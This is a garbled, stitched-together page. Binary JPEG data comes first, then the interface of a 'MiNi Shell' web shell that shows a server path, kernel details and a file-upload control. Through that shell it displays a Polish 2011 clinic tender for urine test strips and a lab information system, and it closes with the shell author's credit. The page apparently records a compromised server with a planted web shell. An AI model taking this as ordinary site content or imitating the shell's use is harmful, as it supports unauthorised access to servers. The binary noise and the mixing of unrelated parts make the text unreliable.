JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110118/7472-N-2011.html

<p class="kh_header"><b>Chrzanów: Dostawa  pasków  testowych  do  moczu   wraz  z  dzierżawą   czytnika  pasków   oraz   dzierżawą   laboratoryjnego  systemu   informatycznego   -  LIS.</b><br>
<b>Numer ogłoszenia: 7472 - 2011; data zamieszczenia: 18.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Lecznictwa Ambulatoryjnego w Chrzanowie , ul. Sokoła 19, 32-500 Chrzanów, woj. małopolskie, tel. 0-32 6240325, faks 0-32 6240310.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zla.chrzanow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  pasków  testowych  do  moczu   wraz  z  dzierżawą   czytnika  pasków   oraz   dzierżawą   laboratoryjnego  systemu   informatycznego   -  LIS..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.Dzierżawa czytnika pasków diagnostycznych do moczu wraz z oprogramowaniem komputerowym na okres  36 miesięcy:
Dzierżawa czytnika testów do moczu powinna obejmować
dostarczenie odczynników do badań z koniecznymi materiałami kontrolnymi, kalibracyjnymi i innymi zużywalnymi niezbędnymi do wykonania badania mocz
możliwość dzierżawienia laboratoryjnego systemu informatycznego LIS
podłączenie aparatu do systemu LIS
Wymagania techniczne i inne dotyczące czytnika pasków diagnostycznych do moczu: 
Lp
Parametry wymagane 
1
Czytnik pasków do moczu fabrycznie nowy przeznaczony do analizy następujących parametrów fiz-chem.   badania ogólnego moczu: glukoza, białko,bilirubina, ciała ketonowe, urobilinogen, azotyny, leukocyty, erytrocyty, pH, ciężar właściwy, barwa  moczu
2
Wyposażony w dotykowy ekran ciekłokrystaliczny , komputer, klawiaturę , wewnętrzną i zewnętrzną  drukarkę , czytnik kodów paskowych ,UPS
3
Czytnik posiada oprogramowanie umożliwiające dokumentację i archiwizację wyników badań z testów paskowych , badań mikroskopowych osadu, badań kontrolnych
4
Czytnik posiada złącze do dwukierunkowej  transmisji danych i komunikacji z zewnętrznym laboratoryjnym systemem informatycznym
5
Wydajność minimum 500 oznaczeń na godzinę 
6
Pamięć minimum 1000 wyników 
7
Kontrola pamięci - pamięć minimum 100 wyników
8
Automatyczne wykrywanie zabarwienia próbki przez analizator
9
Kompensacja własnego zabarwienia moczu
10
Możliwość wyboru barwy i klarowności  moczu z aparatu 
11
Flagowanie wyników patologicznych
12
Możliwość tworzenia w aparacie raportów wyników wymagajacych weryfikacji
13
Możliwość dopisania  wyniku osadu do wyniku w aparacie
14
Możliwość konfiguracji wydruku wyników badań 
15
Możliwość tworzenia list roboczych , raportów  dziennych wyników 
16
Prezentacja wyników kontroli jakości  z możliwością wydruku raportów
17
Kalibracja przy użyciu pasków kalibracyjnych
18
Automatyczny start pasków testowych 
19
Automatyczne usuwanie zużytych pasków do pojemnika na odpady
20
Możliwość wyboru jednostek pomiaru
21
Wewnątrz laboratoryjna kontrola jakości za pomocą płynnych materiałów kontrolnych
22
Czytnik posiada znak CE 
23
Instrukcja obsługi czytnika w języku polskim
24
Wykonawca dostarczy czytnik , zamontuje , uruchomi oraz przeszkoli personel w zakresie obsługi  w ciagu 3 tygodni od dnia podpisania umowy 
25
Wykonawca zapewni bezpłatne serwisowanie czytnika w trakcie trwania umowy ( przeglądy , naprawy, części zamienne , dojazd )
26
Czas reakcji serwisu na zgłoszenie awarii do 24 godzin a dokonanie naprawy do 48 godzin( dni robocze)
27
W przypadku braku możliwości naprawy w terminie 48 godzin , dostarczy  aparat zastępczy
28
Wykonawca  sfinansuje co najmniej 1 x kwartał  ( 4 x w roku )  uczestnictwo w zewnętrznej kontroli jakości badania ogólnego moczu ( LabQality lub Riqas) 
II Dostawa pasków testowych oraz materiałów kontrolnych do oferowanego czytnika 
Specyfikacja  pasków testowych oraz materiałów kontrolnych  do oferowanego czytnika potrzebnych do wykonania 23 000  badań ogólnych moczu  rocznie( 69 000 przez okres 36 miesiecy).Kontrola wewnątrzlaboratoryjna  wykonywana jest codziennie na dwóch poziomach .
 Wymagania dotyczące testów paskowych:
1.Paski charakteryzują się eliminacją wpływu kwasu askorbinowego na wyniki glukozy.
2.Wymagana czułość dla białka nie gorsza niż 20 mg/dl  dla glukozy nie mniejsza niż 50 mg/dl.
3.Paski, materiały kontrolne posiadają znak CE oraz  karty charakterystyki ( proszę dołączyć do oferty)
4.Instrukcje metodyczne dla testów paskowych są w języku polskim i są dołączone do każdego opakowania.
5.Dostawa odczynników odbywała się będzie zgodnie z okresowymi zamówieniami  w czasie do 2 tygodni od dnia złożenia zamówienia.
Ważność dostarczanych  odczynników - minimum 6 miesięcy  licząc od daty dostawy .

Lp
Nazwa produktu
Wielkość opakowania
Cena  jednostkowa  nettowa
Cena  jednostkowa  brutto
Liczba pełnych opakowań/rok
Wartość zamówienia netto /rok
Wartość zamówienia brutto/rok
1
Pasek testowy






2
Mocze kontrolne na 2 poziomach N :
P :
N :
P :





3
Paski kalibracyjne






4
Materiały zużywalne







III  Dzierżawa Laboratoryjnego Systemu Informatycznego - LIS.
Dzierżawa laboratoryjnego Systemu Informatycznego - LIS powinna obejmować:
dostawę oprogramowania zgodnie ze specyfikacją
bezpłatną gwarancje na okres dzierżawy
szkolenia w zakresie obsługi systemu
demontaż sprzętu po upływie terminu umowy

Parametry wymagane dla Laboratoryjnego Systemu Informatycznego:
Lp
Parametry
1
Oferent dostarczy w ramach dzierżawy niezbędne oprogramowanie, sprzęt komputerowy do obsługi 7 stanowisk roboczych plus serwer ,  czytniki kodów kreskowych , czytnik kart zleceń 
2
Oferent zapewni bezpłatnie  w ramach dzierżawy  połączenie wspólnym serwerem analizatorów , wdrożenie  oraz szkolenie z zakresu obsługi systemu
3
System powinien spinać w sieć oferowany czytnik do moczu oraz aparaty posiadane przez laboratorium : 
- COBAS Integra 400 firmy Roche ( biochemia)
- ELECSYS 2010 firmy Roche ( immunologia)
- COAG Chrom3003 firmy BioKsel( koagulologia )
- SYSMEX 1000i firmy Sysmex ( hematologia)
- czytnik OB ESR 48 firmy Kabe 

4
System umożliwia manualne wpisywanie osadu moczu, wynik z oznaczenia elektrolitów ( Na, Cl, K ), rozmaz krwi, komentarz
5
Rejestracja pacjentów i zleceń możliwa manualnie i przy pomocy kodów kreskowych 
6
Rejestracja próbek za pomocą skanera do kart zleceń
7
System umożliwia autoryzację wyników 
8
System umożliwia prowadzenie wewnątrz laboratoryjnej kontroli jakości ( wykresy , SD, CV )wg zasad Westgarda
9
System umożliwia drukowanie wyników pojedynczo  oraz  zbiorowo
10
System posiada możliwość prowadzenia kartotek zleceniodawców oraz  pacjentów 
11
System posiada znakowanie materiału kodami kreskowymi umożliwiającymi jednoznaczną identyfikację próbki ze zleceniem
12
System posiada możliwość tworzenia archiwum
13
System umożliwia zarządzanie informacją ( tworzenie list roboczych, sterowanie przepływem zleceń pomiędzy stanowiskami komputerowymi a analizatorami)
14
System umożliwia kontrolę procesu  walidacji wyników ( wyświetla wartości referencyjne z uwzględnieniem wieku i płci , flaguje wyniki patologiczne )
15
Umożliwia prowadzenie delta Check pacjenta
16
System posiada możliwość konfigurowania wydruków wyników badan
17
Mozliwość wykonywania obliczeń statystycznych liczby zleceń , badań, oznaczeń ogółem i dla poszczególnych kontrahentów 
18
Raportowanie ilości wykonanych badań  w wybranym przedziale czasowym dla wybranego kontrahenta
19
System umozliwia obsługę rozliczeń  finansowych  z kontrahentami, zleceniodawcami , z pacjentami wykonujacymi badania odpłatne
20
Możliwość zabezpieczenia bazy danych przez zainstalowanie osobnego komputera odpowiedzialnego za archiwizowanie i zabezpieczenie danych osobowych pacjenta
21
Wykonawca zapewni bezpłatnie serwisowanie systemu przez cały okres użytkowania
22
Wdrożenie - czas wdrożenia max. 45 dni roboczych od dnia podpisania umowy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają uprawnienia do wykonywania określonej działalności lub czynności poprzez wykazanie : poprzez wykazanie : 
     iż  Wykonawca został zarejestrowany we właściwym ,ze względu na formę organizacyjna ,w jakiej prowadzi działalność  ,rejestrze ( aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej ,jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz dostaw pasków do moczu  wraz z dzierżawą czytnika pasków diagnostycznych do moczu  z oprogramowaniem komputerowym zrealizowanych w okresie ostatnich 36 miesiecy  przed dniem wszczęcia postępowania o wartości 31 000 zł rocznie wraz z dokumentami potwierdzajacymi ,że dostawy zpostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest przedłożyć Oświadczenie w trybie art.22 ustawy -Prawo zamówień publicznych , o spełnieniu warunków udziału w postępowaniu o których mowa w art.22 ustawy .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest przedłożyć Oświadczenie w trybie art.22 ustawy -Prawo zamówień publicznych , o spełnieniu warunków udziału w postępowaniu o których mowa w art.22 ustawy .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest przedłożyć Oświadczenie w trybie art.22 ustawy -Prawo zamówień publicznych , o spełnieniu warunków udziału w postępowaniu o których mowa w art.22 ustawy .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadcvzenie Wykonawcy ,że dostarczany wyrób posiada zaświaadczenie o rejestracji wyrobu w Urzedzie Rejestracji Wyrobów Medycznych.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie Wykonawcy ,że dostarczane wyroby posiadają Deklaracje Zgodności CE (Deklaracja musi zawierać klasę
i regułę klasyfikacji urządzenia )lub inne dokumenty ważne dla danych wyrobów (zaświadczenie niezależnego podmiotu
zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi ).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zla.chrzanow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 32-500 Chrzanów, ul.Sokoła 19 II p sekretariat..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.01.2011 godzina 10:00, miejsce: 32-500 Chrzanów, ul.Sokoła 19 II p sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com